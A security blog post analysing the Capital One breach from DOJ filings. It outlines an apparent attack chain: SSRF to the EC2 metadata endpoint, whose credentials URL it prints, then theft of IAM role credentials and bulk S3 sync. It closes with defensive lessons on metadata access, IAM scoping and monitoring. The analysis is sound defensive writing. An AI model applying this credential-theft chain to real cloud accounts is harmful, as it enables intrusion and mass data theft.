Early Lessons from the Capital One Data Breach

As more details about the Capital One breach are released in court filings and media reporting, we can start to look at where controls failed to prevent this breach and what lessons companies working in AWS can take away from this event. Based on initial court filings, the alleged attacker utilized three commands to access the Capital One data. This summary on (page 6, line 14) of the DOJ complaint has been reported in the media as a trivial attack but based on the wording indicates something more complex.

Using credentials associated with an IAM role:

The summary also does not detail the work required by the attacker to identify the first command in order to obtain the credentials. This section indicates the attack may not be as trivial as something such as a misconfigured S3 bucket. The wording indicates the use of credentials associated with an IAM role. If this is the case, obtaining these credentials likely required a more complex vulnerability as roles do not have the traditional concept of credentials. They would have to be obtained when generated by an AWS service. Most commonly we see these credentials in EC2 metadata when a role is assigned to an instance.

These credentials are typically temporary and designed to minimize the common problems associated with long lived access keys assigned to an IAM account. To access EC2 metadata, an attacker would need to exploit an application or server vulnerability. This is only accessible from an internal endpoint on the EC2 instance and role security credentials can be obtained here:

http://169.254.169.254/latest/meta-data/iam/security-credentials/

The most common method we see used by attackers to access the metadata is a Server-Side Request Forgery (SSRF) vulnerability. This is an application vulnerability that allows an attacker to make network requests as the application or other backend server. This could be legitimate functionality in an application that is abused to access internal resources such as the EC2 metadata. Other methods we have seen to access metadata could be a misconfigured proxy server or poorly provisioned container setups.

Once the attacker is able to return the metadata, they can enumerate and access role metadata assigned to the instance. This would also include temporary security credentials that can be used to impersonate the role. The data is returned in this type of format:

{
  "Code" : "Success",
  "LastUpdated" : "2012-04-26T16:39:16Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "token",
  "Expiration" : "2017-05-17T15:09:54Z"
}

Accessing the S3 bucket using the role credentials

Another significant aspect of this attack was being able to access the S3 bucket using the role credentials. This indicates the IAM role may have been over provisioned access to the S3 service or the application/server being exploited was a management server that needed S3 access. It is not uncommon in large AWS environments for IAM access to be over provisioned although these details are currently unknown.

Using S3 sync to recursively copy the contents of specific buckets

The final command was to use S3 sync to recursively copy the contents of specific buckets. In the compliant, page 8 line 4, indicates the files downloaded included those with a naming scheme of .snappy.parquet. This file format is optimized for searching and analysis on large datasets. A single file could have contained millions of records. The extent that these files were distributed is currently unknown. However, multiple individuals were aware of the alleged attacker’s public activities from Twitter and Slack channel named "Netcrave Communications". Capital One became aware of the breach via disclosure to their vulnerability disclosure program.

Early Lessons Learned

This is a developing story and a lot of information is still unknown. However, based on the details in the DOJ complaint, we start to see some all too common problems faced by companies operating large AWS environments. These include limiting access to EC2 metadata, excessive IAM provisioning and lack of comprehensive monitoring.

Lesson 1: Limiting Access to EC2 Metadata

At this time AWS does not provide a scalable way to restrict access to EC2 metadata. If this was one of the vectors used in this attack, hopefully it pushes AWS to provide more scalable controls for metadata access. Currently, in order to implement mitigations for this problem, you are left with using IAM condition keys or firewall/proxy access to the metadata endpoint.

IAM policy supports the use of condition keys by source IP or user agent. This can be applied to IAM roles to limit use of the temporary security credentials. You can configure the source IP to the NAT gateway or limit to a specific user-agent that would be harder for an attacker to add to requests. This is not super scalable if you have a large number of NAT gateways and the list of source IPs is constantly changing. Further information on IAM condition keys can be found here.

The other option is to completely block access to the metadata endpoint using a host-based firewall such as IPTables or use a proxy in front of the endpoint. Lyft and Netflix have released projects that offer a proxy option allowing you to add further restrictions such as additional header checks.

Lesson 2: Excessive IAM Provisioning

Excessive IAM provisioning is all too common in large AWS environments. Tools exist to identify obvious IAM over provisioning of access such as having Administrator policy attached. Things get harder when you have 1,000s of AWS accounts and no clear insight into how each account is being managed. Getting control of IAM policies at scale, making access granular and auditing is non-trivial in AWS. New tools from AWS such as Organizations, AWS Landing Zone and Control Tower can help with this problem. These tools provide a way to standardize AWS account provisioning and security auditing across 1000s of accounts. These tools should be accompanied by administrative controls with financial teams to prevent rogue AWS accounts from being created outside standard processes. These recommendations can require significant organizational changes and likely won't happen overnight.

A great tool for performing point in time audits of IAM principals (accounts, roles, etc) is CloudMapper.

CloudMapper requires Security Audit access and runs against the AWS API to provide an IAM report of obvious misconfigurations and over provisioning. Furthermore, you can extend this tool with custom commands to help identify services specific to over provisioning.

Ironically, Capital One has also released great open source tools for AWS compliance such as Cloud Custodian. This highlights the challenges faced by companies operating large scale cloud-based environments.

Lesson 3: Active Monitoring

Active monitoring for security events is a huge consideration within AWS. One available service within AWS that can provide a basic level of monitoring is GuardDuty. I am unsure whether all aspects of this attack would have been detected by GuardDuty, however, it does have rules available to detect misuse of instance credentials and use of TOR to access the API or EC2.

Summary

This breach shed some light on the challenges faced by large organizations using cloud providers at scale. It does not appear as trivial as an exposed S3 bucket but most likely a failure of multiple controls to stop an attacker. Preventing future such attacks will require cloud providers and organizations to constantly work together to review IAM access and how credentials can be used.

This breach also shows the benefits of a vulnerability disclosure program. Without such a program there would be no direct communication channel for security researchers to report significant vulnerabilities or findings such as this data breach.